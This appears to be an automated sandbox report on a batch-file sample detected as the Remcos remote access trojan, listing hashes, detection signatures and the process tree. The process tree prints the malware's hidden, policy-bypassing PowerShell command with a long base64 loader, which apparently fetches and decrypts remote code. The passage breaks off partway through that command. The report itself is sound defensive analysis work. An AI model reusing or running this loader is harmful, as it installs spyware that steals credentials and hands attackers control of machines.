Edit tour
Windows
Analysis Report
As7KZaO9Dy.bat
Overview
General Information
| Sample name: | As7KZaO9Dy.batrenamed because original name is a hash value |
| Original sample name: | ef523c286eea072a9afd853f1c09629eaad923d3283865182ff0f75899fb5aa0.bat |
| Analysis ID: | 1612234 |
| MD5: | c25ef8c23f1bb4dd53eb0e811456678b |
| SHA1: | b9ac6ded68cd19d069c49adeeb20d6b74bf6d29c |
| SHA256: | ef523c286eea072a9afd853f1c09629eaad923d3283865182ff0f75899fb5aa0 |
| Tags: | abokirem-duckdns-orgbatuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 1976 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\As7KZ aO9Dy.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4304 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\As7KZa O9Dy.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 3664 cmdline: "C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('dHJ5e2l leCAoKGlle CAoKCdkcGp uenp1YXd0c mx3cmNpZHB qbnp6dWF3d HJsd3Jjd2R wam56enVhd 3RybHdyY3J kcGpuenp1Y Xd0cmx3cmM gZHBqbnp6d WF3dHJsd3J jLWRwam56e nVhd3RybHd yY1VkcGpue np1YXd0cmx 3cmNzZHBqb np6dWF3dHJ sd3JjZWRwa m56enVhd3R ybHdyY0Jkc Gpuenp1YXd 0cmx3cmNhZ HBqbnp6dWF 3dHJsd3Jjc 2Rwam56enV hd3RybHdyY 2lkcGpuenp 1YXd0cmx3c mNjZHBqbnp 6dWF3dHJsd 3JjUGRwam5 6enVhd3Ryb HdyY2FkcGp uenp1YXd0c mx3cmNyZHB qbnp6dWF3d HJsd3Jjc2R wam56enVhd 3RybHdyY2l kcGpuenp1Y Xd0cmx3cmN uZHBqbnp6d WF3dHJsd3J jZ2Rwam56e nVhd3RybHd yYyAiZHBqb np6dWF3dHJ sd3JjaGRwa m56enVhd3R ybHdyY3Rkc Gpuenp1YXd 0cmx3cmN0Z HBqbnp6dWF 3dHJsd3Jjc GRwam56enV hd3RybHdyY 3NkcGpuenp 1YXd0cmx3c mM6ZHBqbnp 6dWF3dHJsd 3JjL2Rwam5 6enVhd3Ryb HdyYy9kcGp uenp1YXd0c mx3cmMwZHB qbnp6dWF3d HJsd3JjeGR wam56enVhd 3RybHdyYzB kcGpuenp1Y Xd0cmx3cmM uZHBqbnp6d WF3dHJsd3J jc2Rwam56e nVhd3RybHd yY3RkcGpue np1YXd0cmx 3cmMvZHBqb np6dWF3dHJ sd3JjOGRwa m56enVhd3R ybHdyY0tkc Gpuenp1YXd 0cmx3cmN1Z HBqbnp6dWF 3dHJsd3JjV mRwam56enV hd3RybHdyY y5kcGpuenp 1YXd0cmx3c mNwZHBqbnp 6dWF3dHJsd 3Jjc2Rwam5 6enVhd3Ryb HdyYzFkcGp uenp1YXd0c mx3cmMiJyk uUmVwbGFjZ SgnZHBqbnp 6dWF3dHJsd 3JjJywnJyk pKS5Db250Z W50KSAtRXJ yb3JBY3Rpb 24gU2lsZW5 0bHlDb250a W51ZX1jYXR jaHt9O2Z1b mN0aW9uIGp sanJuKCRwY XJhbV92YXI pewkkYWVzX 3Zhcj1bU3l zdGVtLlNlY 3VyaXR5LkN yeXB0b2dyY XBoeS5BZXN dOjpDcmVhd GUoKTsJJGF lc192YXIuT W9kZT1bU3l zdGVtLlNlY 3VyaXR5LkN yeXB0b2dyY XBoeS5DaXB oZXJNb2RlX To6Q0JDOwk kYWVzX3Zhc i5QYWRkaW5 nPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LlBhZGRpb mdNb2RlXTo 6UEtDUzc7C SRhZXNfdmF yLktleT1bU 3lzdGVtLkN vbnZlcnRdO jooJ2duaXJ 0UzQ2ZXNhQ m1vckYnWy0 xLi4tMTZdI C1qb2luICc nKSgnKzZHW k90V2lZOUN 0NVY4NDFML 3IzUVdTcll CcTY3a0tOd Et0VDFpckQ rbz0nKTsJJ GFlc192YXI uSVY9W1N5c 3RlbS5Db25 2ZXJ0XTo6K CdnbmlydFM 0NmVzYUJtb 3JGJ1stMS4 uLTE2XSAta m9pbiAnJyk oJ1lXVmd0S 09na1hDa0h KZzRielF6d nc9PScpOwk kZGVjcnlwd G9yX3Zhcj0 kYWVzX3Zhc i5DcmVhdGV EZWNyeXB0b 3IoKTsJJHJ ldHVybl92Y XI9JGRlY3J 5cHRvcl92Y XIuVHJhbnN mb3JtRmluY WxCbG9jayg kcGFyYW1fd mFyLCAwLCA kcGFyYW1fd mFyLkxlbmd 0aCk7CSRkZ WNyeXB0b3J fdmFyLkRpc 3Bvc2UoKTs JJGFlc192Y XIuRGlzcG9 zZSgpOwkkc mV0dXJuX3Z hcjt9ZnVuY 3Rpb24gYmp yeWsoJHBhc mFtX3Zhcil 7CUlFWCAnJ HBsYXRwPU5 ldy1PYmplY 3QgU3lzdGV tLklPLk1BQ kNlbUFCQ29 yQUJDeVNBQ kN0ckFCQ2V hQUJDbSgsJ HBhcmFtX3Z hcik7Jy5SZ XBsYWNlKCd BQkMnLCAnJ yk7CUlFWCA nJG1iZGliP U5ldy1PYmp lY3QgU3lzd GVtLklPLkF CQ01BQkNlQ UJDbUFCQ29 BQkNyQUJDe UFCQ1NBQkN 0QUJDckFCQ 2VBQkNhQUJ DbUFCQzsnL lJlcGxhY2U oJ0FCQycsI CcnKTsJSUV YICckcnhhY 2E9TmV3LU9 iamVjdCBTe XN0ZW0uSU8 uQ0FCQ29tQ